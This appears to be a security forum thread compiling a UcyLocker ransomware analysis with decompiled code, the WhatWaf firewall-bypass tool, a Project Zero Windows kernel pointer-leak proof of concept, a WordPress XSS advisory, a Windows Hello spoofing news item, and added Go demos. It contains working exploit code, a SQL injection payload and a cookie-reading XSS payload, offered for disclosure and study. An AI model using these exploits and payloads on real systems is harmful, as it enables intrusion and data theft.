The function accepts a string file, probably the path. Then it generates another pass key, hashes it and encrypts the file with AES_Encrypt. It changes the file extension and overwrites the file.

Message Creator:

public void messageCreator()
{
    string str = @"\Desktop\READ_IT.txt";
    string path = this.userDir + this.userName + str;
    string[] contents = new string[] { "Your files have been er
    File.WriteAllLines(path, contents);
}

The message creator drops a readme file onto the desktop upon function call.

CreatePassword:

public string CreatePassword(int length)
{
    StringBuilder builder = new StringBuilder();
    Random random = new Random();
    while (0 < length--)
    {
        builder.Append("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/"[random.Next("abcdefghijk
    }
    return builder.ToString();
}

Basically, a random password generator.

SendPassword:

public void SendPassword(string password)
{
    string[] textArray1 = new string[] { this.computerName, "-", this.userName, " ", password };
    string str = string.Concat(textArray1);
}

I am confused about what this function is doing; it seems like nothing. More on that in the dynamic analysis.

EncryptDirectory: Encrypts all the files in the directory. It gets the extensions of the files in the directory, and if the current file has one of the extensions the malware is looking for, it encrypts the file.

The main functionality:

public void startAction()
{
    string password = this.CreatePassword(15);
    string str2 = @"\Desktop\";
    string location = this.userDir + this.userName + str2;
    this.SendPassword(password);
    this.encryptDirectory(location, password);
    this.messageCreator();
    password = null;
}

It seems the malware is only encrypting files on the desktop, since it is hard coded as a function parameter. The rest of the forms don't have anything special, except for this:

private void button1_Click(object sender, EventArgs e)
{
    MessageBox.Show("Checking Payment.............Pleasse Wait", "Please wait");
    MessageBox.Show("Your Payment has failed, The funs have been sent back to your wallet. Please send it again", "Error");
}

Found on form3, this is very worrying. I also did not see any decryption methods that could be triggered.

Static Conclusion: The malware generates a new password, or a key. Then it uses that key to encrypt all the files in the directory, which is the desktop in this malware's case. When this task is completed it drops a readme file and pops up a window with payment options and warning options.

Dynamic Review: Running Process Explorer and Process Monitor, I filtered unrelated process events out of the program. The program indeed dropped a READ_IT file, encrypted only the files located on the desktop and disabled the Task Manager.

Attempt to black out the wallpaper as seen in Process Monitor:
11:04:.... 3520 RegSetValue HKCU\Control Panel\Desktop\Wallpaper SUCCESS Type: REG_SZ, Le...

Disable Task Manager:

Drop READ_IT file:

But it's easy to revert most of its effects. The desktop has not been changed, and we simply need to remove the registry key that I showed above to restore the Task Manager operations. The program, as suspected, made no contact with any server or IP. If your files are encrypted with this program you cannot revert the files back, EVER.

When you click that you paid for the decryption the program prompts this message:

Clicking "OK" will always result in the following message, as seen in the code:

But the money will not be refunded, as there are no other function triggers on this button click, as seen in the code.

The program adds the .WINDOWS extension to all files it encrypts on the desktop (it only encrypts files on the desktop); changing that extension back to the original one will show a messed up file.

Conclusion: This program is dangerous, but not the most dangerous. You can't run it unless you have the correct version of .NET installed on your computer. It only encrypts files on the desktop, and not to mention that it does not encrypt all file extensions. It does disable the Task Manager and attempts to change the desktop background, but you can revert those effects. The only thing that you won't get back is your files. This example shows how easy it is to construct ransomware, how easy it is to steal money, and that even in 2017 (this sample was caught in June 2017) people still download and double click on files called "VapeHacksLoader" and run them. Be careful out there.

Source: https://malwaretips.com/threads/the-ucylocker-ransomware.78330/
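The post above describes the sample's key chain (SHA256 of the password fed into Rfc2898DeriveBytes, a key and an IV pulled from it, then AES in CBC mode) and explains why ECB leaks plaintext structure. The following Go program is an added example written for this page, not the ransomware's code and not a decompilation of it: it re-implements that chain with the standard library only (PBKDF2-HMAC-SHA1 is written out because Rfc2898DeriveBytes uses that PRF and no third-party module is assumed), and then encrypts the same repeated plaintext under ECB and CBC to show that only ECB leaves identical ciphertext blocks. The salt, password, iteration count and sample plaintext are constructed values; the sample's real salt and iteration count are not shown in the post.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha1"
	"crypto/sha256"
	"encoding/binary"
	"encoding/hex"
	"fmt"
)

// pbkdf2SHA1 is RFC 2898 PBKDF2 with HMAC-SHA1, the PRF behind .NET's
// Rfc2898DeriveBytes, spelled out so nothing outside the standard library is needed.
func pbkdf2SHA1(password, salt []byte, iterations, keyLen int) []byte {
	prf := hmac.New(sha1.New, password)
	var out []byte
	var index [4]byte
	for i := 1; len(out) < keyLen; i++ {
		binary.BigEndian.PutUint32(index[:], uint32(i))
		prf.Reset()
		prf.Write(salt)
		prf.Write(index[:])
		u := prf.Sum(nil)              // U_1 = PRF(P, S || INT(i))
		t := append([]byte(nil), u...) // T_i = U_1 xor U_2 xor ... xor U_c
		for j := 1; j < iterations; j++ {
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil) // U_j = PRF(P, U_{j-1})
			for k := range t {
				t[k] ^= u[k]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// deriveKeyIV follows the sample's chain: SHA256(password) is the PBKDF2 password, and
// GetBytes(32) then GetBytes(16) on one object are consecutive slices of a single PBKDF2 stream.
func deriveKeyIV(password string, salt []byte, iterations int) (key, iv []byte) {
	hashed := sha256.Sum256([]byte(password))
	stream := pbkdf2SHA1(hashed[:], salt, iterations, 32+16)
	return stream[:32], stream[32:48]
}

// pkcs7Pad extends the input to whole AES blocks, matching .NET's default PaddingMode.
func pkcs7Pad(data []byte) []byte {
	n := aes.BlockSize - len(data)%aes.BlockSize
	return append(append([]byte(nil), data...), bytes.Repeat([]byte{byte(n)}, n)...)
}

// encryptCBC is the mode the sample selects: each plaintext block is XORed with the
// previous ciphertext block (the IV for the first) before it is encrypted.
func encryptCBC(block cipher.Block, iv, plaintext []byte) []byte {
	padded := pkcs7Pad(plaintext)
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, padded)
	return out
}

// encryptECB encrypts every block independently, so equal plaintext blocks give
// equal ciphertext blocks: the pattern leak the post warns about.
func encryptECB(block cipher.Block, plaintext []byte) []byte {
	padded := pkcs7Pad(plaintext)
	out := make([]byte, len(padded))
	for i := 0; i < len(padded); i += aes.BlockSize {
		block.Encrypt(out[i:i+aes.BlockSize], padded[i:i+aes.BlockSize])
	}
	return out
}

// repeatedBlocks counts ciphertext blocks already seen earlier in the same ciphertext;
// anything above zero means plaintext structure survived encryption.
func repeatedBlocks(ciphertext []byte) int {
	seen, repeats := map[string]bool{}, 0
	for i := 0; i+aes.BlockSize <= len(ciphertext); i += aes.BlockSize {
		b := string(ciphertext[i : i+aes.BlockSize])
		if seen[b] {
			repeats++
		}
		seen[b] = true
	}
	return repeats
}

func main() {
	salt := []byte("constructed-salt") // constructed; the sample's real salt is not shown
	key, iv := deriveKeyIV("Xy7!kQ2pLm9*aB4", salt, 1000)
	block, err := aes.NewCipher(key) // a 32-byte key selects AES-256
	if err != nil {
		panic(err)
	}
	fmt.Printf("key=%s\niv=%s\n", hex.EncodeToString(key), hex.EncodeToString(iv))
	plaintext := bytes.Repeat([]byte("0123456789ABCDEF"), 4) // constructed file with repeated content
	fmt.Println("ECB repeated blocks:", repeatedBlocks(encryptECB(block, plaintext)))
	fmt.Println("CBC repeated blocks:", repeatedBlocks(encryptCBC(block, iv, plaintext)))
}
```

Because the salt and iteration count are fixed in the binary, everything after CreatePassword is deterministic: whoever holds the 15-character password can re-derive the key and IV exactly as above and decrypt, and since SendPassword never transmits it, nobody does.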
  19. Nytro Security
      ^the essence of digital core
  20. WhatWaf?

WhatWaf is an advanced firewall detection tool whose goal is to give you the idea of "There's a WAF?". WhatWaf works by detecting a firewall on a web application, and attempting to detect a bypass (or two) for said firewall, on the specified target.

Features
- Ability to run on a single URL with the -u/--url flag
- Ability to run through a list of URLs with the -l/--list flag
- Ability to detect over 40 different firewalls
- Ability to try over 20 different tampering techniques
- Ability to pass your own payloads either from a file, from the terminal, or use the default payloads
- Default payloads that are guaranteed to produce at least one WAF triggering
- Ability to bypass firewalls using both SQLi techniques and cross site scripting techniques
- Ability to run behind multiple proxy types (socks4, socks5, http, https and Tor)
- Ability to use a random user agent, personal user agent, or custom default user agent
- Auto assign protocol to HTTP or ability to force protocol to HTTPS
- A built in encoder so you can encode your payloads into the discovered bypasses
- More to come...

Installation
Installing whatwaf is super easy, all you have to do is the following. Have Python 2.7 (Python 3.x compatibility is being implemented soon):

sudo -s << EOF
git clone https://github.com/ekultek/whatwaf.git
cd whatwaf
chmod +x whatwaf.py
pip2 install -r requirements.txt
./whatwaf.py --help
EOF

Proof of Concept
First we'll run the website through WhatWaf and figure out which firewall protects it (if any):
Next we'll go to that website and see what the page looks like:
Hmm.. that doesn't really look like Cloudflare does it? Let's see what the headers say:
And finally, let's try one of the bypasses that it tells us to try:

Demo video

Get involved!
If you want to make some tamper scripts, want to add some functionality or just want to make something look better, getting involved is easy:
- Fork the repository
- Edit the code to your liking
- Send a pull request

I'm always looking for some helpful people out there, and would love help with this little side project I got going on. Thanks!

Download: WhatWaf-master.zip
git clone https://github.com/Ekultek/WhatWaf.git

Source: https://github.com/Ekultek/WhatWaf
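To make the detect-then-bypass loop described above concrete, here is an added example written for this page; it is not WhatWaf's code (WhatWaf is Python, and the page's other examples are in Go) and its signature list is illustrative rather than WhatWaf's own. It fingerprints a WAF from the blocking response, then resends a few tampered forms of the payload and reports the ones that get through. The two HTTP responses and the fakeSend function are constructed stand-ins for a live target, so it runs offline.

```go
package main

import (
	"bufio"
	"fmt"
	"io"
	"net/http"
	"net/url"
	"strings"
)

// wafSignature maps a product to the response traits that give it away.
// Illustrative fingerprints only, not WhatWaf's signature set.
type wafSignature struct {
	name    string
	headers map[string]string // header -> substring expected in its value (case-insensitive)
	body    string            // substring expected in the body, "" for none
}

var signatures = []wafSignature{
	{"Cloudflare", map[string]string{"Server": "cloudflare", "CF-RAY": ""}, ""},
	{"Sucuri CloudProxy", map[string]string{"Server": "sucuri"}, ""},
	{"Incapsula", map[string]string{"X-CDN": "incapsula"}, ""},
	{"ModSecurity", map[string]string{}, "mod_security"},
}

// parseResponse turns a raw HTTP response (captured, or constructed as here) into headers and body.
func parseResponse(raw string) (*http.Response, string, error) {
	resp, err := http.ReadResponse(bufio.NewReader(strings.NewReader(raw)), nil)
	if err != nil {
		return nil, "", err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	return resp, string(body), err
}

// identifyWAF returns the first signature all of whose traits are present, or "".
func identifyWAF(resp *http.Response, body string) string {
	lower := strings.ToLower(body)
	for _, sig := range signatures {
		ok := sig.body == "" || strings.Contains(lower, sig.body)
		for name, want := range sig.headers {
			got := resp.Header.Get(name)
			ok = ok && got != "" && strings.Contains(strings.ToLower(got), want)
		}
		if ok {
			return sig.name
		}
	}
	return ""
}

// tampers are the payload rewrites tried once a WAF has been identified.
var tampers = []struct {
	name string
	fn   func(string) string
}{
	{"space2comment", func(p string) string { return strings.ReplaceAll(p, " ", "/**/") }},
	{"urlencode", url.QueryEscape},
	{"doubleurlencode", func(p string) string { return url.QueryEscape(url.QueryEscape(p)) }},
}

// probe sends the plain payload, fingerprints whatever blocks it, then resends each
// tampered variant; variants answered with a non-error status are reported as bypasses.
func probe(send func(payload string) (string, error), payload string) (string, []string, error) {
	raw, err := send(payload)
	if err != nil {
		return "", nil, err
	}
	resp, body, err := parseResponse(raw)
	if err != nil {
		return "", nil, err
	}
	waf := identifyWAF(resp, body)
	if waf == "" {
		return "", nil, nil
	}
	var passed []string
	for _, t := range tampers {
		variant := t.fn(payload)
		if raw, err := send(variant); err == nil {
			if r, _, err := parseResponse(raw); err == nil && r.StatusCode < 400 {
				passed = append(passed, t.name+": "+variant)
			}
		}
	}
	return waf, passed, nil
}

// Constructed responses standing in for a live target.
const (
	cloudflareBlock = "HTTP/1.1 403 Forbidden\r\nServer: cloudflare\r\nCF-RAY: 3cfd1234abcd5678-LHR\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n<h1>Attention Required!</h1>"
	plainOK         = "HTTP/1.1 200 OK\r\nServer: nginx/1.12.2\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n<html>ok</html>"
)

// fakeSend models a Cloudflare-fronted site that blocks the raw payload but misses the comment-for-space variant.
func fakeSend(payload string) (string, error) {
	if strings.Contains(payload, "/**/") {
		return plainOK, nil
	}
	return cloudflareBlock, nil
}

func main() {
	waf, passed, err := probe(fakeSend, "' OR 1=1-- -")
	if err != nil {
		panic(err)
	}
	fmt.Println("WAF:", waf)
	for _, p := range passed {
		fmt.Println("bypass:", p)
	}
}
```

Against a real target, send would be an HTTP client; the one caveat a 200 on a tampered payload does not prove is that the payload also reached the backend unmangled, which is why WhatWaf's PoC above goes on to try the bypass by hand.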
  21. /*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1456

We have discovered that it is possible to disclose addresses of kernel-mode Paged Pool allocations via a race-condition in the implementation of the NtQueryVirtualMemory system call (information class 2, MemoryMappedFilenameInformation). The vulnerability affects Windows 7 to 10, 32-bit and 64-bit.

The output buffer for this information class is a UNICODE_STRING structure followed by the actual filename string. The output data is copied back to user-mode memory under the following stack trace (on Windows 7 64-bit):

--- cut ---
kd> k
 # Child-SP          RetAddr           Call Site
00 fffff880`03cfd8c8 fffff800`02970229 nt!memcpy+0x3
01 fffff880`03cfd8d0 fffff800`02970752 nt!IopQueryNameInternal+0x289
02 fffff880`03cfd970 fffff800`02967bb4 nt!IopQueryName+0x26
03 fffff880`03cfd9c0 fffff800`0296a80d nt!ObpQueryNameString+0xb0
04 fffff880`03cfdac0 fffff800`0268d093 nt!NtQueryVirtualMemory+0x5fb
05 fffff880`03cfdbb0 00000000`772abf6a nt!KiSystemServiceCopyEnd+0x13
--- cut ---

An example of an output region is shown below:

--- cut ---
kd> db rdx rdx+r8-1
fffff8a0`01a78010  2e 00 30 00 00 00 00 00-20 80 a7 01 a0 f8 ff ff  ..0..... .......
fffff8a0`01a78020  5c 00 44 00 65 00 76 00-69 00 63 00 65 00 5c 00  \.D.e.v.i.c.e.\.
fffff8a0`01a78030  48 00 61 00 72 00 64 00-64 00 69 00 73 00 6b 00  H.a.r.d.d.i.s.k.
fffff8a0`01a78040  56 00 6f 00 6c 00 75 00-6d 00 65 00 32 00 00 00  V.o.l.u.m.e.2...
--- cut ---

Here, we can observe a kernel-mode address (fffff8a0`01a78020) of the textual string that follows the UNICODE_STRING, at offset 0x8. This means that the entire original kernel-mode structure is copied to ring-3, and then later the client's UNICODE_STRING.Buffer pointer is fixed up to point into the userland string. This condition could be referred to as a "double write" (as opposed to double fetch), where the kernel first copies some sensitive/confidential data into user-mode, and later overwrites it with legitimate output.

Due to the synchronous way applications interact with the system, the clients only see the end result and therefore cannot observe the information disclosure that takes place in the meantime. However, it is possible to exploit the race condition if one is aware of the existence of such a bug. In order to obtain the leaked kernel pointer, we must read it in between the two writes. This is easiest achieved by running two concurrent threads (on a multi-core machine) -- one continuously invoking the affected NtQueryVirtualMemory syscall, and the other reading the UNICODE_STRING.Buffer member in a loop and checking if it's a kernel-mode pointer. This scheme is implemented in the attached proof-of-concept program. An example output from Windows 7 64-bit is as follows:

--- cut ---
C:\>NtQueryVirtualMemory.exe
Leaked pointer: fffff8a0014b2010
Leaked pointer: fffff8a0014f5010
Leaked pointer: fffff8a00153b010
Leaked pointer: fffff8a001567010
Leaked pointer: fffff8a0015b1010
Leaked pointer: fffff8a0015c9010
Leaked pointer: fffff8a0015dc010
Leaked pointer: fffff8a0015f9010
Leaked pointer: fffff8a0017ff010
Leaked pointer: fffff8a00180b010
Leaked pointer: fffff8a001810010
Leaked pointer: fffff8a001832010
Leaked pointer: fffff8a001833010
Leaked pointer: fffff8a00182a010
[...]
--- cut ---

################################################################################

Update: The insecure behavior of nt!IopQueryNameInternal can be also reached via nt!NtQueryObject. See the following stack trace:

--- cut ---
kd> k
 # Child-SP          RetAddr           Call Site
00 fffff880`025548a8 fffff800`02970229 nt!memcpy+0x3
01 fffff880`025548b0 fffff800`02970752 nt!IopQueryNameInternal+0x289
02 fffff880`02554950 fffff800`02967bb4 nt!IopQueryName+0x26
03 fffff880`025549a0 fffff800`02971f7d nt!ObpQueryNameString+0xb0
04 fffff880`02554aa0 fffff800`0268d093 nt!NtQueryObject+0x1c7
05 fffff880`02554bb0 00000000`772abe3a nt!KiSystemServiceCopyEnd+0x13
--- cut ---

And the region being copied:

--- cut ---
kd> db rdx rdx+r8-1
fffff8a0`01666bf0  2e 00 30 00 00 00 00 00-00 6c 66 01 a0 f8 ff ff  ..0......lf.....
fffff8a0`01666c00  5c 00 44 00 65 00 76 00-69 00 63 00 65 00 5c 00  \.D.e.v.i.c.e.\.
fffff8a0`01666c10  48 00 61 00 72 00 64 00-64 00 69 00 73 00 6b 00  H.a.r.d.d.i.s.k.
fffff8a0`01666c20  56 00 6f 00 6c 00 75 00-6d 00 65 00 32 00 00 00  V.o.l.u.m.e.2...
--- cut ---

Note the kernel-mode address fffff8a0`01666c00 at offset 0x8 of the memory dump.

################################################################################

MSRC have responded that their current policy with regards to addressing kernel pool pointer leaks is as follows:

--- cut ---
Please note that due to some By-Design kernel pointer leaks already present in our platforms, Information Disclosures which only disclose kernel pool pointers will only be serviced in v.Next until all by design disclosures can be resolved. Information Disclosures of uninitialized kernel memory will continue to be serviced via Security Updates. Any leaks within privileged processes will also be considered v.Next; unless you can supply PoC which proves that you can perform the same leak - but not kernel pool pointer leaks - as an unprivileged user.
--- cut ---

As this particular bug only facilitates the disclosure of kernel pool pointers, it was classified as a v.Next issue (fixed in a future version of Windows) and closed on the MSRC side. I'm therefore derestricting the details of the bug here, too.
*/

// Build as a native C++ console program and link against ntdll.lib, which exports NtQueryVirtualMemory.
#include <Windows.h>
#include <winternl.h>
#include <cstdio>

namespace globals {
BYTE OutputBuffer[1024];
}  // namespace globals

typedef enum _MEMORY_INFORMATION_CLASS {
  MemoryMappedFilenameInformation = 2
} MEMORY_INFORMATION_CLASS;

extern "C"
NTSTATUS NTAPI NtQueryVirtualMemory(
    _In_ HANDLE ProcessHandle,
    _In_opt_ PVOID BaseAddress,
    _In_ MEMORY_INFORMATION_CLASS MemoryInformationClass,
    _Out_ PVOID MemoryInformation,
    _In_ SIZE_T MemoryInformationLength,
    _Out_opt_ PSIZE_T ReturnLength
);

// Loose check: anything in the upper half of the address space is treated as a kernel pointer.
BOOL IsKernelPointer(ULONG_PTR Pointer) {
#ifdef _WIN64
  return (Pointer >= 0xfff8000000000000);
#else  // 32-bit
  return (Pointer >= 0x80000000);
#endif
}

// Reader thread: spins on UNICODE_STRING.Buffer, hoping to observe it between the
// kernel's first write (raw kernel structure) and its second write (fixed-up pointer).
DWORD WINAPI ThreadProc(_In_ LPVOID lpParameter) {
  PUNICODE_STRING OutputString = (PUNICODE_STRING)globals::OutputBuffer;
  ULONG_PTR LastPointer = 0;

  while (1) {
    ULONG_PTR Pointer = 0;
    memcpy(&Pointer, &OutputString->Buffer, sizeof(ULONG_PTR));

    if (IsKernelPointer(Pointer) && Pointer != LastPointer) {
      printf("Leaked pointer: %Ix\n", Pointer);
      LastPointer = Pointer;
    }
  }

  return 0;
}

int main() {
  CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);

  // Writer loop: keep the kernel rewriting the same buffer so the race window recurs.
  while (1) {
    SIZE_T ReturnLength;
    NTSTATUS st = NtQueryVirtualMemory(GetCurrentProcess(),
                                       &main,
                                       MemoryMappedFilenameInformation,
                                       globals::OutputBuffer,
                                       sizeof(globals::OutputBuffer),
                                       &ReturnLength);

    if (!NT_SUCCESS(st)) {
      printf("NtQueryVirtualMemory failed, %x\n", st);
      ExitProcess(1);
    }
  }

  return 0;
}

Source: exploit-db.com
  22. WordPress CSV Import-Export plugin version 1.1 suffers from a cross site scripting vulnerability.

Product: CSV Import-Export Wordpress Plugin - https://wordpress.org/plugins/csv-import-export/
Vendor: eSparkBiz
Tested version: 1.1
CVE ID: CVE-2017-17753

** CVE description **
Multiple cross-site scripting (XSS) vulnerabilities in the esb-csv-import-export plugin through 1.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) cie_type, (2) cie_import, (3) cie_update, or (4) cie_ignore parameter to includes/admin/views/esb-cie-import-export-page.php.

** Technical details **
In the conditional block at includes/admin/views/esb-cie-import-export-page.php:21, the cie_type, cie_import, cie_update and cie_ignore HTTP GET parameters are echoed back to the user without proper sanitization.

Vulnerable code: https://plugins.trac.wordpress.org/browser/csv-import-export/trunk/includes/admin/views/esb-cie-import-export-page.php#L21

** Proof of Concept **
http://<host>/wordpress/wp-admin/admin.php?page=esb-cie-import-export-page&cie_ignore=<script>alert(document.cookie);</script>

** Solution **
No fix available yet.

** Timeline **
12/10/2017: vendor contacted; no reply
24/10/2017: vendor contacted; no reply
31/10/2017: vendor contacted; vendor asks for more details then stops replying
05/12/2017: vendor contacted; no reply
19/12/2017: report published

** Credits **
Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI).

--
Best Regards,
Nicolas Buzy-Debat
Orange Cyberdefense Singapore (CERT-LEXSI)

This message and its attachments may contain confidential or privileged information that may be protected by law; they should not be distributed, used or copied without authorisation. If you have received this email in error, please notify the sender and delete this message and its attachments. As emails may be altered, Orange is not liable for messages that have been modified, changed or falsified. Thank you.

# 0day.today [2017-12-20] #
Source: 0day.today
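The advisory's bug is a GET parameter echoed straight into the page. As an added illustration that is not the plugin's code (and in Go rather than the plugin's PHP, so the page's examples share one language), the following shows the same bug shape beside its fix: a hypothetical handler that writes the cie_ignore parameter into an HTML attribute with fmt, and one that renders it through html/template, which escapes for the attribute context it lands in. The request path and parameter name are copied from the advisory's proof of concept; the handlers themselves are invented for this example. In the plugin's own PHP the equivalent fix is wrapping each echo in esc_attr() or esc_html().

```go
package main

import (
	"fmt"
	"html/template"
	"net/http"
	"net/http/httptest"
	"net/url"
)

// vulnerableHandler echoes the query parameter straight into HTML, the same
// shape of bug as the echoed cie_* parameters in the advisory (hypothetical handler).
func vulnerableHandler(w http.ResponseWriter, r *http.Request) {
	w.Header().Set("Content-Type", "text/html; charset=utf-8")
	fmt.Fprintf(w, `<input type="text" name="cie_ignore" value="%s">`, r.URL.Query().Get("cie_ignore"))
}

// page is the same markup as a template; html/template knows the value sits inside
// a quoted attribute and escapes quotes and angle brackets accordingly.
var page = template.Must(template.New("p").Parse(`<input type="text" name="cie_ignore" value="{{.}}">`))

// hardenedHandler renders through the template, so the payload ends up as inert text.
func hardenedHandler(w http.ResponseWriter, r *http.Request) {
	w.Header().Set("Content-Type", "text/html; charset=utf-8")
	if err := page.Execute(w, r.URL.Query().Get("cie_ignore")); err != nil {
		http.Error(w, err.Error(), http.StatusInternalServerError)
	}
}

// render runs a handler against a GET carrying the given cie_ignore value and returns the body.
func render(h http.HandlerFunc, cieIgnore string) string {
	target := "/wp-admin/admin.php?page=esb-cie-import-export-page&cie_ignore=" + url.QueryEscape(cieIgnore)
	req := httptest.NewRequest(http.MethodGet, target, nil)
	rec := httptest.NewRecorder()
	h(rec, req)
	return rec.Body.String()
}

func main() {
	payload := `"><script>alert(document.cookie)</script>` // the advisory's payload, closing the attribute first
	fmt.Println("vulnerable:", render(vulnerableHandler, payload))
	fmt.Println("hardened:  ", render(hardenedHandler, payload))
}
```

The vulnerable output contains the closing quote and a live script tag; the hardened output turns the quote into &#34; and the angle brackets into &lt; and &gt;, so the browser shows the payload as the field's value instead of executing it.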
  23. After you update, set it up again from scratch

If you've skipped recent Windows 10 Creators Updates, here's a reason to change your mind: its facial recognition security feature, Hello, can be spoofed with a photograph.

The vulnerability was announced by German pentest outfit Syss at Full Disclosure. Even if you've installed the fixed versions that shipped in October – builds 1703 or 1709 – facial recognition has to be set up from scratch to make it resistant to the attack.

The "simple spoofing attacks" described in the post are all variations on using a "modified printed photo of an authorised user" (a frontal photo, naturally) so an attacker can log into a locked Windows 10 system. On vulnerable versions this works against both the default config and Windows Hello with its "enhanced anti-spoofing" feature enabled, Syss claimed.

"If 'enhanced anti-spoofing' is enabled, depending on the targeted Windows 10 version, a slightly different modified photo with other attributes has to be used, but the additional effort for an attacker is negligible."

The researchers tested their attack against a Dell Latitude running Windows 10 Pro, build 1703; and a Microsoft Surface Pro 4 running build 1607. They tried to change the Surface Pro's config to "enhanced anti-spoofing", but claimed its "LilBit USB IR camera only supported the default configuration and could not be used with the more secure face recognition settings."

The researchers published three proof-of-concept videos, below.

Via theregister.co.uk
  24. Allow it from the router.